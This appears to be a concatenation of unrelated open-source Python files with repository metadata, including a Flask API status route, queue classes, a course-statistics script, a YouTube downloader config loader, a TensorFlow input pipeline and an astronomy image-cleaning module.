logger.info(f"Request delivery error: {exc}")
# Wait some time before sending another request
await asyncio.sleep(3)
async def start_requesting(r):
await r.start()
await asyncio.sleep(1)
asyncio.get_event_loop().create_task(message_requester(r))
run(start_requesting(requester), finalize=requester.stop)
| 33.326087 | 97 | 0.613177 | 0 | 0 | 0 | 0 | 0 | 0 | 1,459 | 0.475864 | 906 | 0.295499 |
4437b9810c4e7fa906b091e98a1904da452af26d | 915 | py | Python | api/v1/views/index.py | bdbaraban/HolbertonBnB | 70812bcef485e4d57ca0f7a1d0ddc59583f4122a | [
"MIT"
] | 1 | 2022-02-08T03:51:31.000Z | 2022-02-08T03:51:31.000Z | api/v1/views/index.py | bdbaraban/HolbertonBnB | 70812bcef485e4d57ca0f7a1d0ddc59583f4122a | [
"MIT"
] | null | null | null | api/v1/views/index.py | bdbaraban/HolbertonBnB | 70812bcef485e4d57ca0f7a1d0ddc59583f4122a | [
"MIT"
] | 8 | 2020-12-10T14:41:39.000Z | 2022-03-10T21:35:59.000Z | #!/usr/bin/env python3
"""Defines a status route for the HolbertonBnB API."""
from flask import jsonify
from flasgger import swag_from
from models import storage
from api.v1.views import app_views
@app_views.route("/status")
@swag_from("../apidocs/status/status.yml")
def status():
"""Returns the server status.
Returns:
JSON object with the current server status.
"""
return jsonify({"status": "OK"})
@app_views.route("/stats")
@swag_from("../apidocs/stats/stats.yml")
def stats():
"""Retrives the count of each object type.
Returns:
JSON object with the number of objects by type."""
return jsonify({
"amenities": storage.count("Amenity"),
"cities": storage.count("City"),
"places": storage.count("Place"),
"reviews": storage.count("Review"),
"states": storage.count("State"),
"users": storage.count("User")
})
| 26.142857 | 58 | 0.645902 | 0 | 0 | 0 | 0 | 712 | 0.778142 | 0 | 0 | 475 | 0.519126 |
4437e9f6903630a640348af85239c86e44387d67 | 2,499 | py | Python | helper.py | NorthwoodsDev/CircuitPython_Companion_Bot | de9283d0af8f59d1ffc2fd43f39d90baee041859 | [
"MIT"
] | null | null | null | helper.py | NorthwoodsDev/CircuitPython_Companion_Bot | de9283d0af8f59d1ffc2fd43f39d90baee041859 | [
"MIT"
] | null | null | null | helper.py | NorthwoodsDev/CircuitPython_Companion_Bot | de9283d0af8f59d1ffc2fd43f39d90baee041859 | [
"MIT"
] | null | null | null | import os
import storage
import time
import board
import random
import microcontroller
def get_rndRGB():
a = (random.randint(20, 235))
b = (random.randint(20, 235))
c = (random.randint(20, 235))
return (a,b,c)
def timelasp(monoClk_last, monoClk_Interact, user_AFK):
try:
monoClk = time.monotonic()
monoClk_eclip = monoClk - monoClk_last
if monoClk_eclip > 60:
monoClk_last = monoClk
monoClk_Interact += 1
if monoClk_Interact > 5:
user_AFK = True
else:
user_AFK = False
except Exception as e:
print("Error Timer:" + str(e))
return monoClk_last, monoClk_Interact, user_AFK
def doframe(lastFrame, frame):
try:
frame = False
monoClk = time.monotonic()
frameEclip = monoClk - lastFrame
if frameEclip > 0.3:
lastFrame = monoClk
frame = True
except Exception as e:
print("Error Frame:" + str(e))
return lastFrame, frame
def save(companbot_x_stat):
try:
print ("Saving")
storage.remount("/", False)
eventLog = open("save.csv", "w+")
eventLog.write(str(companbot_x_stat.xp) + "," + str(companbot_x_stat.lvl)+ "," + str(companbot_x_stat.hp) + "," + str(companbot_x_stat.pAtk) + "," + str(companbot_x_stat.pDef) + "," + str(companbot_x_stat.cred) + '\n')
eventLog.close()
storage.remount("/", True)
except Exception as e:
print ("Error writing log: " + str(e))
storage.remount("/", True)
return
def load(companbot_x):
try:
eventLog = open("save.csv", "r")
sf = eventLog.read()
sfa = sf.split(',')
companbot_x.xp = sfa[0].strip()
companbot_x.lvl = sfa[1].strip()
companbot_x.hp = sfa[2].strip()
companbot_x.pAtk = sfa[3].strip()
companbot_x.pDef = sfa[4].strip()
companbot_x.cred = sfa[5].strip()
except Exception as e:
print ("Error loading save: " + str(e))
return companbot_x
def chat():
sayWhat = ["Hello.",
"Ahcooo!",
"Stay cool.",
"Just keep walking.",
"Groovy.",
"I'm having Fun!",
"Have you seen my friends?",
"Let's Adventure!",
"Wonder what to do next?",
"Chilldogs.",
"Do you like to dance?",
"When do we eat?",
"Let's play Blackjack!",
"Watch out for monsters.",
"Hmm...Hm.Hmm. Oh!",
"What you doing?"]
say = sayWhat[random.randint(0, 15)]
return say | 27.766667 | 226 | 0.577831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 418 | 0.167267 |
4437f26ba6c39393772f578c50974f0c3bd7647f | 3,538 | py | Python | data_strctures/queue.py | CodenameREBIRTH/algopy | f3894c98b7232d0f6067eb52ca68f9e6a8875884 | [
"MIT"
] | 4 | 2019-09-28T17:02:47.000Z | 2020-01-15T15:51:40.000Z | data_strctures/queue.py | CodenameREBIRTH/algopy | f3894c98b7232d0f6067eb52ca68f9e6a8875884 | [
"MIT"
] | 1 | 2019-10-15T03:56:59.000Z | 2019-10-15T03:56:59.000Z | data_strctures/queue.py | CodenameREBIRTH/algopy | f3894c98b7232d0f6067eb52ca68f9e6a8875884 | [
"MIT"
] | 3 | 2019-10-14T16:22:08.000Z | 2020-10-07T08:32:08.000Z | import inspect
class Queue(object):
'''
Queue data structure FIFO - First In First Out
'''
def __init__(self, capacity = 10):
'''
:param size: max capacity of the queue, default is 10
'''
self.queue = []
self.front = None
self.rear = None
self.size = 0
self.capacity = capacity
def __str__(self):
'''
:return:
'''
return ' '.join([str(i) for i in self.queue])
def get_size(self):
'''
:return: current size of the queue
'''
return self.size
def is_empty(self):
'''
:return: true if queue is empty, false otherwise
'''
return self.size == 0
def enequeue(self, value):
'''
:param value: value to be enqueued
:return: -1 if queue is full
'''
if self.size >= self.capacity:
return -1
else:
self.queue.append(value)
if self.front is None:
self.front = self.rear = 0
else:
self.rear = self.size
self.size += 1
def dequeue(self):
'''
:return: the element removed from the queue, None if queue is empty
'''
if self.is_empty():
return None
else:
self.size -= 1
if self.size == 0:
self.front = self.rear = 0
else:
self.rear = self.size - 1
return self.queue.pop(0)
@staticmethod
def get_code():
'''
:return: return source code for current class
'''
return inspect.getsource(Queue)
class Deque(object):
'''
Deque -> doubly ended queue
'''
def __init__(self, capacity = 10):
'''
:param capacity: max capacity of the deque
'''
self.queue = []
self.capacity = capacity
def __str__(self):
return ' '.join([str(i) for i in self.queue])
def is_full(self):
'''
to check whether deque is full or not
:return: true if deque is full, false otherwise
'''
return len(self.queue) == self.capacity
def is_empty(self):
'''
to check whether deque is empty or not
:return: true if deque is empty, false otherwise
'''
return len(self.queue) == 0
def insert_right(self, info):
'''
:param info: data to be added
:return: None if deque is full
'''
if self.is_full():
return None
else:
self.queue.append(info)
def insert_left(self, info):
'''
:param info: data to be added
:return: None if deque is full
'''
if self.is_full():
return None
else:
self.queue.insert(0, info)
def remove_left(self):
'''
:return: element which is removed, None if deque is empty
'''
if not self.is_empty():
return self.queue.pop(0)
else:
return None
def remove_right(self):
'''
:return: remove element from right end
'''
if self.is_empty():
return None
else:
self.queue.pop()
@staticmethod
def get_code():
'''
:return: source code for the current class
'''
return inspect.getsource(Deque)
# TODO -> add priority queue and circuler queue for concept purpose
| 18.331606 | 75 | 0.498021 | 3,433 | 0.970322 | 0 | 0 | 302 | 0.085359 | 0 | 0 | 1,379 | 0.389768 |
4438dec493c05b8f2b45e2e4cf553dc716b064b6 | 4,549 | py | Python | course_science.py | 9999years/brandeis-classes | e43d0227bafb4562d533565f3e94cd799ce636b8 | [
"MIT"
] | null | null | null | course_science.py | 9999years/brandeis-classes | e43d0227bafb4562d533565f3e94cd799ce636b8 | [
"MIT"
] | null | null | null | course_science.py | 9999years/brandeis-classes | e43d0227bafb4562d533565f3e94cd799ce636b8 | [
"MIT"
] | null | null | null | import itertools
import os.path
from collections import Counter
from glob import glob
from typing import List, Mapping
import brandeis
COURSES = {}
def all_courses() -> Mapping[str, List[brandeis.Course]]:
global COURSES
if COURSES:
return COURSES
else:
COURSES = read_all()
return COURSES
def read(fname: str) -> List[brandeis.Course]:
"""for initializing COURSES"""
with open(fname, "r") as f:
return brandeis.load_courses(f)
def read_all(outdir: str = "out") -> List[brandeis.Course]:
"""for initializing COURSES"""
pat = os.path.join(outdir, "*-*.json")
ret = {}
# theyre numbered so this works
for fname in sorted(glob(pat)):
base, *_ = os.path.basename(fname).split(os.path.extsep)
year, semester = base.split("-")
if semester == "1":
# january
# semester = '01'
pass
elif semester == "2":
# skip summer
continue
elif semester == "3":
# september
# semester = '09'
pass
else:
raise ValueError("Invalid semester number " + semester)
ret[f"{year}-{semester}"] = read(fname)
return ret
def display_semester(sem) -> str:
yr, sem = sem.split("-")
sem = {"1": "Spring", "3": "Fall",}[sem]
return f"{yr} {sem}"
def total_courses_per_subject():
ret = {}
for courses in all_courses().values():
for course in courses:
if course.subject not in ret:
ret[course.subject] = 0
ret[course.subject] += 1
return ret
def courses_per_subject():
ret = {}
for sem, courses in all_courses().items():
ret[sem] = Counter(map(lambda c: c.subject, courses))
return ret
def courses_per_semester(subj=None) -> List[int]:
ret = {}
for sem, courses in all_courses().items():
if subj is not None:
courses = list(filter(lambda c: c.subject == subj, courses))
ret[sem] = len(courses)
return ret
def students_per_semester(subj=None) -> List[int]:
ret = {}
for sem, courses in all_courses().items():
if subj is not None:
courses = list(filter(lambda c: c.subject == subj, courses))
ret[sem] = sum(map(lambda c: c.enrolled, courses))
return ret
def students_per_class():
total_courses = []
for sem, courses in all_courses().items():
total_courses.extend(courses)
ret = {}
for subj in brandeis.constants.SUBJECTS:
subj_courses = list(
filter(
lambda e: e > 0,
map(
lambda c: c.enrolled,
filter(lambda c: c.subject == subj, total_courses),
),
)
)
if subj_courses:
ret[subj] = sum(subj_courses) / len(subj_courses)
return ret
def students_per_class_total():
total_courses = []
for sem, courses in all_courses().items():
total_courses.extend(courses)
courses = list(filter(lambda e: e > 0, map(lambda c: c.enrolled, total_courses)))
return sum(courses) / len(courses)
def student_enrollments():
ret = {}
for sem, courses in all_courses().items():
ret[sem] = {}
for subj in brandeis.constants.SUBJECTS:
ret[sem][subj] = sum(
map(lambda c: c.enrolled, filter(lambda c: c.subject == subj, courses))
)
return ret
def sorted_dict(d):
return [(k, d[k]) for k in sorted(d, key=d.get, reverse=True)]
def printdict(d):
i = 0
print("[")
for sem, dat in d.items():
i += 1
sem = format(repr(display_semester(sem)), "13")
print("[", sem, ",", dat, "],")
print("]")
def main():
# corr = courses_per_semester()
# for sem, dat in courses_per_semester('COSI').items():
# corr[sem] = dat / corr[sem]
# print(*map(lambda x: f'{x[0]} | {x[1]}],', students_per_class().items()), sep='\n')
printdict(student_enrollments())
# print(*sorted_dict(students_per_class()['2018-3']), sep='\n')
# print(sorted(set(map(lambda c: c.subject, itertools.chain(*all_courses().values())))))
# subjects = total_courses_per_subject()
# subjects = [(k, subjects[k]) for k in sorted(subjects, key=subjects.get, reverse=True)]
# print(*[s[0] for s in subjects if s[1] > 500], sep='\n')
# for sem, courses in courses_per_subject().items():
# print(sem, ':', courses.most_common(5))
if __name__ == "__main__":
main()
| 27.403614 | 93 | 0.573533 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 931 | 0.20466 |
44399f62445aff54bdaa825b5afca3b8782554ba | 1,803 | py | Python | merak/utils/refs.py | Yao1993/merak | 517b7a8eca82eebbf22bcd3688a79e1e76ed9d42 | [
"Apache-2.0"
] | 16 | 2021-01-22T04:09:30.000Z | 2022-03-17T10:38:34.000Z | merak/utils/refs.py | Yao1993/merak | 517b7a8eca82eebbf22bcd3688a79e1e76ed9d42 | [
"Apache-2.0"
] | 6 | 2021-04-12T10:09:47.000Z | 2022-03-24T09:31:13.000Z | merak/utils/refs.py | Yao1993/merak | 517b7a8eca82eebbf22bcd3688a79e1e76ed9d42 | [
"Apache-2.0"
] | 2 | 2021-07-14T05:39:17.000Z | 2021-07-28T16:27:40.000Z | # Copyright 2021 (David) Siu-Kei Muk. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
def _get_lib_root():
root = os.path.join(os.path.dirname(__file__), "..")
return os.path.abspath(root)
class _PrefixPathDict(dict):
def __init__(self, prefix):
super(_PrefixPathDict, self).__init__()
self._prefix = prefix
def __setitem__(self, key, value):
if isinstance(value, str):
value = os.path.join(self._prefix, value)
super(_PrefixPathDict, self).__setitem__(key, value)
def _PackageDataMeta(prefix):
class _Meta(type):
@classmethod
def __prepare__(metacls, name, bases):
origin = super(_Meta, _Meta).__prepare__(metacls=metacls,
__name=name,
__bases=bases)
pfx_path_dict = _PrefixPathDict(
os.path.join(_get_lib_root(), prefix))
if origin: pfx_path_dict.update(origin)
return pfx_path_dict
return _Meta
class Template(metaclass=_PackageDataMeta("data")):
PY_INIT = "__init__.tmpl"
PY_SETUP = "setup.tmpl"
| 32.781818 | 80 | 0.665003 | 832 | 0.461453 | 0 | 0 | 402 | 0.222962 | 0 | 0 | 709 | 0.393233 |
443a6baa9c0756dd7aae2e5c5109341c173ecdeb | 538 | py | Python | Python/kth-largest-element-in-a-stream.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2020-10-27T03:22:31.000Z | 2020-10-27T03:22:31.000Z | Python/kth-largest-element-in-a-stream.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | null | null | null | Python/kth-largest-element-in-a-stream.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2021-03-22T18:58:23.000Z | 2021-03-22T18:58:23.000Z | # Time: O(nlogk)
# Space: O(k)
import heapq
class KthLargest(object):
def __init__(self, k, nums):
"""
:type k: int
:type nums: List[int]
"""
self.__k = k
self.__min_heap = []
for n in nums:
self.add(n)
def add(self, val):
"""
:type val: int
:rtype: int
"""
heapq.heappush(self.__min_heap, val)
if len(self.__min_heap) > self.__k:
heapq.heappop(self.__min_heap)
return self.__min_heap[0]
| 19.214286 | 44 | 0.494424 | 489 | 0.908922 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.286245 |
443e6327aedef6ac6c12e9616d7d14e817f67223 | 3,344 | py | Python | youtube_series_downloader/gateways/config_gateway.py | Senth/youtube-series-downloader | fadacc16798de336e4f5a2cf7648219bffb67016 | [
"MIT"
] | 3 | 2021-02-13T12:46:11.000Z | 2022-03-20T21:43:37.000Z | youtube_series_downloader/gateways/config_gateway.py | Senth/youtube-series-downloader | fadacc16798de336e4f5a2cf7648219bffb67016 | [
"MIT"
] | 14 | 2021-04-19T09:52:23.000Z | 2021-11-24T20:01:50.000Z | youtube_series_downloader/gateways/config_gateway.py | Senth/youtube-series-downloader | fadacc16798de336e4f5a2cf7648219bffb67016 | [
"MIT"
] | null | null | null | import os
import platform
from configparser import ExtendedInterpolation
from pathlib import Path
from subprocess import run
from sys import exit
from typing import List
from blulib.config_parser import ConfigParser
from tealprint import TealPrint
from tealprint.teallevel import TealLevel
from youtube_series_downloader.config import General, config
from youtube_series_downloader.core.channel import Channel
class ConfigGateway:
def __init__(self) -> None:
self.path = Path.home().joinpath(f".{config.app_name}.cfg")
self.parser = ConfigParser(interpolation=ExtendedInterpolation())
def check_config_exists(self) -> None:
if not self.path.exists():
TealPrint.info(f"Could not find any configuration file in {self.path}")
user_input = input("Do you want to copy the example config and edit it (y/n)?")
if user_input.lower() == "y":
self.parser.copy_example_if_conf_not_exists(config.app_name)
editor = ""
if "EDITOR" in os.environ:
editor = os.environ["EDITOR"]
if editor == "" and platform.system() == "Windows":
editor = "notepad.exe"
elif editor == "":
editor = "vim"
run([editor, self.path])
else:
exit(0)
def read(self):
self.parser.read(self.path)
def get_general(self) -> General:
general = General()
self.parser.to_object(
general,
"General",
"series_dir",
"int:threads",
"float:speed_up_default",
"int:max_days_back",
"log_level",
)
if not general.series_dir:
TealPrint.warning(f"Missing 'series_dir' in [General] in your configuration. Please add it.", exit=True)
# Convert string to LogLevel
if isinstance(general.log_level, str):
try:
general.log_level = TealLevel[general.log_level]
except KeyError:
TealPrint.warning(
f"Failed to set log_level from config, invalid level: {general.log_level}. Setting log_level to info"
)
general.log_level = TealLevel.info
return general
def get_channels(self) -> List[Channel]:
channels: List[Channel] = []
for section in self.parser.sections():
if ConfigGateway.is_channel_section(section):
channel = Channel()
channel.name = section
self.parser.to_object(
channel,
section,
"id",
"name",
"dir->collection_dir",
"float:speed",
"str_list:includes",
"str_list:excludes",
)
if not channel.id:
TealPrint.warning(
f"Missing 'id' for channel [{section}] in your configuration. Please add it.", exit=True
)
channels.append(channel)
return channels
@staticmethod
def is_channel_section(section: str) -> bool:
return section != "General" and section != "DEFAULT" and section != "vars"
| 34.833333 | 121 | 0.559211 | 2,930 | 0.876196 | 0 | 0 | 146 | 0.04366 | 0 | 0 | 665 | 0.198864 |
443e759d16cba07de3629249873b2670919d009a | 5,590 | py | Python | activeClassifier/env/input_fn.py | dHonerkamp/ActiveClassifier | 052675277153594db64261cd56699a057e633de2 | [
"Apache-2.0"
] | null | null | null | activeClassifier/env/input_fn.py | dHonerkamp/ActiveClassifier | 052675277153594db64261cd56699a057e633de2 | [
"Apache-2.0"
] | null | null | null | activeClassifier/env/input_fn.py | dHonerkamp/ActiveClassifier | 052675277153594db64261cd56699a057e633de2 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
def parse_function(filename, label, FLAGS):
image_string = tf.read_file(filename)
# Don't use tf.image.decode_image, or the output shape will be undefined
image = tf.image.decode_png(image_string, channels=FLAGS.img_shape[-1])
# This will convert to float values in [0, 1]
image = tf.image.convert_image_dtype(image, tf.float32)
image.set_shape(FLAGS.img_shape)
if FLAGS.dataset == "omniglot":
# change lines to 1 and empty space to 0 as in mnist to be potentially able to cross-train
image = tf.abs(image - 1)
return image, label
def translate_function(image, label, FLAGS):
'''
Not sure if translation differs every epoch or not atm.
Alternative: could pass a vector with pre-sampled x1, y1 (and a counter to index) along to ensure same translation.
'''
if FLAGS.translated_size:
pad_height = FLAGS.translated_size - FLAGS.img_shape[0]
pad_width = FLAGS.translated_size - FLAGS.img_shape[1]
image = tf.reshape(image, FLAGS.img_shape)
y1 = tf.random_uniform(shape=[], maxval=pad_height, dtype=tf.int32)
x1 = tf.random_uniform(shape=[], maxval=pad_width, dtype=tf.int32)
image = tf.pad(image, [(y1, pad_height - y1), (x1, pad_width - x1), (0,0)], mode='constant', constant_values=0.)
return image, label
def resize_function(image, label, FLAGS):
image = tf.image.resize_images(image, 2 * [FLAGS.img_resize], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
return image, label
def pipeline(data, batch_sz, FLAGS, shuffle, repeats, n, preftch=4):
translate_fn = lambda img, label: translate_function(img, label, FLAGS)
parse_fn = lambda img, label: parse_function(img, label, FLAGS)
resize_fn = lambda img, label: resize_function(img, label, FLAGS)
out_data = (tf.data.Dataset.from_tensor_slices(data)
.shuffle(buffer_size=tf.cast(n, tf.int64), reshuffle_each_iteration=shuffle)
)
if FLAGS.dataset in ["MNIST_cluttered", "omniglot"]:
out_data = out_data.map(parse_fn, num_parallel_calls=FLAGS.num_parallel_preprocess)
if FLAGS.img_resize:
out_data = out_data.map(resize_fn, num_parallel_calls=FLAGS.num_parallel_preprocess)
if FLAGS.translated_size:
out_data = out_data.map(translate_fn, num_parallel_calls=FLAGS.num_parallel_preprocess)
if FLAGS.cache:
out_data = out_data.cache()
out_data = (out_data
# .apply(batch_and_drop_remainder(FLAGS.batch_size)) # tSNE requires known batch_sz
.batch(batch_sz)
.repeat(repeats)
.prefetch(preftch)
)
return out_data
def input_fn(FLAGS, batch_sz):
'''train, valid, test: tuples of (images, labels)'''
def mask_batch_sz(shape):
return [None] + list(shape[1:])
features_ph_train = tf.placeholder(FLAGS.data_dtype[0], mask_batch_sz(FLAGS.train_data_shape[0]))
labels_ph_train = tf.placeholder(FLAGS.data_dtype[1], mask_batch_sz(FLAGS.train_data_shape[1]))
features_ph_valid = tf.placeholder(FLAGS.data_dtype[0], mask_batch_sz(FLAGS.valid_data_shape[0]))
labels_ph_valid = tf.placeholder(FLAGS.data_dtype[1], mask_batch_sz(FLAGS.valid_data_shape[1]))
features_ph_test = tf.placeholder(FLAGS.data_dtype[0], mask_batch_sz(FLAGS.test_data_shape[0]))
labels_ph_test = tf.placeholder(FLAGS.data_dtype[1], mask_batch_sz(FLAGS.test_data_shape[1]))
tr_data = pipeline((features_ph_train, labels_ph_train), batch_sz, FLAGS, repeats=tf.cast(tf.ceil(FLAGS.num_epochs + FLAGS.num_epochs / FLAGS.eval_step_interval), tf.int64), shuffle=True, n=FLAGS.train_data_shape[0][0])
# repeats * 2 because also used for visualization etc.
valid_data = pipeline((features_ph_valid, labels_ph_valid), batch_sz, FLAGS, repeats=tf.cast(tf.ceil(20 * FLAGS.num_epochs / FLAGS.eval_step_interval), tf.int64), shuffle=False, n=FLAGS.valid_data_shape[0][0])
test_data = pipeline((features_ph_test, labels_ph_test), batch_sz, FLAGS, repeats=tf.cast(tf.ceil(20 * FLAGS.num_epochs / FLAGS.eval_step_interval), tf.int64), shuffle=False, n=FLAGS.test_data_shape[0][0])
if FLAGS.img_resize:
FLAGS.img_shape[0:2] = 2 * [FLAGS.img_resize]
if FLAGS.translated_size:
FLAGS.img_shape[0:2] = 2 * [FLAGS.translated_size]
handle = tf.placeholder(tf.string, shape=[], name='handle')
iterator = tf.data.Iterator.from_string_handle(handle, tr_data.output_types, tr_data.output_shapes)
# iterator = tf.data.Iterator.from_structure(tr_data.output_types, tr_data.output_shapes)
images, labels = iterator.get_next()
train_init_op = tr_data.make_initializable_iterator()
valid_init_op = valid_data.make_initializable_iterator()
test_init_op = test_data.make_initializable_iterator()
# train_init_op = iterator.make_initializer(tr_data)
# valid_init_op = iterator.make_initializer(valid_data)
# test_init_op = iterator.make_initializer(test_data)
inputs = {'images': images,
'labels': labels,
'features_ph_train': features_ph_train,
'labels_ph_train' : labels_ph_train,
'features_ph_valid': features_ph_valid,
'labels_ph_valid' : labels_ph_valid,
'features_ph_test' : features_ph_test,
'labels_ph_test' : labels_ph_test,
'handle': handle,
'train_init_op': train_init_op,
'valid_init_op': valid_init_op,
'test_init_op': test_init_op}
return inputs
| 47.777778 | 226 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,067 | 0.190877 |
443e880e410b850c486af0532ecd8869505aeb29 | 60 | py | Python | investigateModules/compareModulePatches.py | kromerh/solarAnalytics | 8d450746dcf45b5ae3933b5e2d8838a23c8b32ea | [
"MIT"
] | null | null | null | investigateModules/compareModulePatches.py | kromerh/solarAnalytics | 8d450746dcf45b5ae3933b5e2d8838a23c8b32ea | [
"MIT"
] | null | null | null | investigateModules/compareModulePatches.py | kromerh/solarAnalytics | 8d450746dcf45b5ae3933b5e2d8838a23c8b32ea | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import os
import re
| 10 | 19 | 0.783333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
443fa902e796b93ad8d348cfbafd34b5dc71eedd | 15,348 | py | Python | amical/data_processing.py | anand0xff/AMICAL | 703ab4ead01054240ff5d43b6fb020d7877fd6cd | [
"MIT"
] | null | null | null | amical/data_processing.py | anand0xff/AMICAL | 703ab4ead01054240ff5d43b6fb020d7877fd6cd | [
"MIT"
] | null | null | null | amical/data_processing.py | anand0xff/AMICAL | 703ab4ead01054240ff5d43b6fb020d7877fd6cd | [
"MIT"
] | null | null | null | """
@author: Anthony Soulain (University of Sydney)
-------------------------------------------------------------------------
AMICAL: Aperture Masking Interferometry Calibration and Analysis Library
-------------------------------------------------------------------------
Functions related to data cleaning (ghost, background correction,
centering, etc.) and data selection (sigma-clipping, centered flux, etc.).
--------------------------------------------------------------------
"""
import numpy as np
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from astropy.io import fits
from matplotlib import pyplot as plt
from matplotlib.colors import PowerNorm
from termcolor import cprint
from tqdm import tqdm
from amical.tools import apply_windowing, crop_max
def _apply_patch_ghost(cube, xc, yc, radius=20, dx=0, dy=-200, method='bg'):
"""Apply a patch on an eventual artifacts/ghosts on the spectral filter (i.e.
K1 filter of SPHERE presents an artifact/ghost at (392, 360)).
Arguments:
----------
`cube` {array} -- Data cube,\n
`xc` {int} -- x-axis position of the artifact,\n
`yc` {int} -- y-axis position of the artifact.
Keyword Arguments:
----------
`radius` {int} -- Radius to apply the patch in a circle (default: {10}),\n
`dy` {int} -- Offset pixel number to compute background values (default: {0}),\n
`dx` {int} -- Same along y-axis (default: {0}),\n
`method` {str} -- If 'bg', the replacement values are the background computed at
xc+dx, yx+dy, else zero is apply (default: {'bg'}).
"""
cube_corrected = []
for i in range(len(cube)):
imA = cube[i].copy()
isz = imA.shape[0]
xc_off, yc_off = xc+dx, yc+dy
xx, yy = np.arange(isz), np.arange(isz)
xx_c = (xx-xc)
yy_c = (yc-yy)
xx_off = (xx-xc_off)
yy_off = (yc_off-yy)
distance = np.sqrt(xx_c**2 + yy_c[:, np.newaxis]**2)
distance_off = np.sqrt(xx_off**2 + yy_off[:, np.newaxis]**2)
cond_patch = (distance <= radius)
cond_bg = (distance_off <= radius)
if method == 'bg':
imA[cond_patch] = imA[cond_bg]
elif method == 'zero':
imA[cond_patch] = 0
cube_corrected.append(imA)
cube_corrected = np.array(cube_corrected)
return cube_corrected
def select_data(cube, clip_fact=0.5, clip=False, verbose=True, display=True):
    """ Check the cleaned data cube using the position of the maximum in the
    fft image (supposed to be zero). If not in zero position, the frame is
    rejected. It can apply a sigma-clipping to select only the frames with the
    highest total fluxes.

    Parameters:
    -----------
    `cube` {array} -- Data cube,\n
    `clip_fact` {float} -- Number of sigma below the median flux used as the
    clipping threshold (default: 0.5),\n
    `clip` {bool} -- If True, sigma-clipping is used,\n
    `verbose` {bool} -- If True, print informations in the terminal,\n
    `display` {bool} -- If True, plot figures.

    Returns:
    --------
    `cube_cleaned_checked` {array} -- Cube restricted to the selected frames.
    """
    fft_fram = abs(np.fft.fft2(cube))

    # fft[0, 0] is the zero-frequency term, i.e. the total flux of each frame.
    fluxes, flag_fram, good_fram = [], [], []
    for i in range(len(fft_fram)):
        fluxes.append(fft_fram[i][0, 0])
        pos_max = np.argmax(fft_fram[i])
        if pos_max != 0:
            # Maximum of the power spectrum is not at the zero-frequency
            # position: the frame is considered off-centered and flagged.
            flag_fram.append(i)
        else:
            good_fram.append(cube[i])

    fluxes = np.array(fluxes)
    flag_fram = np.array(flag_fram)

    best_fr = np.argmax(fluxes)
    worst_fr = np.argmin(fluxes)

    std_flux = np.std(fluxes)
    med_flux = np.median(fluxes)

    if verbose:
        if (med_flux/std_flux) <= 5.:
            cprint('\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True).' % (
                (med_flux/std_flux)), 'cyan')

    # Frames with a total flux below this limit are rejected when clip=True.
    limit_flux = med_flux - clip_fact*std_flux

    if clip:
        cond_clip = (fluxes > limit_flux)
        cube_cleaned_checked = cube[cond_clip]
        ind_clip = np.where(fluxes <= limit_flux)[0]
    else:
        ind_clip = []
        cube_cleaned_checked = np.array(good_fram)

    # Used only to annotate the worst frame in the figure title below.
    ind_clip2 = np.where(fluxes <= limit_flux)[0]
    if ((worst_fr in ind_clip2) and clip) or (worst_fr in flag_fram):
        ext = '(rejected)'
    else:
        ext = ''

    diffmm = 100*abs(np.max(fluxes) - np.min(fluxes))/med_flux

    if display:
        plt.figure()
        plt.plot(fluxes, label=r'|$\Delta F$|/$\sigma_F$=%2.0f (%2.2f %%)' %
                 (med_flux/std_flux, diffmm))
        if len(flag_fram) > 0:
            plt.scatter(flag_fram, fluxes[flag_fram],
                        s=52, facecolors='none', edgecolors='r', label='Rejected frames (maximum fluxes)')
        if clip:
            if len(ind_clip) > 0:
                plt.plot(ind_clip, fluxes[ind_clip], 'rx',
                         label='Rejected frames (clipping)')
            plt.hlines(limit_flux, 0, len(fluxes), lw=1,
                       ls='--', label='Clipping limit', zorder=10)
        plt.legend(loc='best', fontsize=9)
        plt.ylabel('Flux [counts]')
        plt.xlabel('# frames')
        plt.grid(alpha=.2)
        plt.tight_layout()

        plt.figure(figsize=(7, 7))
        plt.subplot(2, 2, 1)
        plt.title('Best fram (%i)' % best_fr)
        plt.imshow(cube[best_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
        plt.subplot(2, 2, 2)
        plt.imshow(np.fft.fftshift(fft_fram[best_fr]), cmap='gist_stern')
        plt.subplot(2, 2, 3)
        plt.title('Worst fram (%i) %s' % (worst_fr, ext))
        plt.imshow(cube[worst_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
        plt.subplot(2, 2, 4)
        plt.imshow(np.fft.fftshift(fft_fram[worst_fr]), cmap='gist_stern')
        plt.tight_layout()
        plt.show(block=False)

    if verbose:
        n_good = len(cube_cleaned_checked)
        n_bad = len(cube) - n_good
        if clip:
            cprint('\n---- σ-clip + centered fluxes selection ---', 'cyan')
        else:
            cprint('\n---- centered fluxes selection ---', 'cyan')

        print('%i/%i (%2.1f%%) are flagged as bad frames' %
              (n_bad, len(cube), 100*float(n_bad)/len(cube)))

    return cube_cleaned_checked
def sky_correction(imA, r1=100, dr=20, verbose=False):
    """Shift the image so the sky annulus [r1, r1+dr] averages to zero.

    The background level is estimated as the mean flux inside a ring of
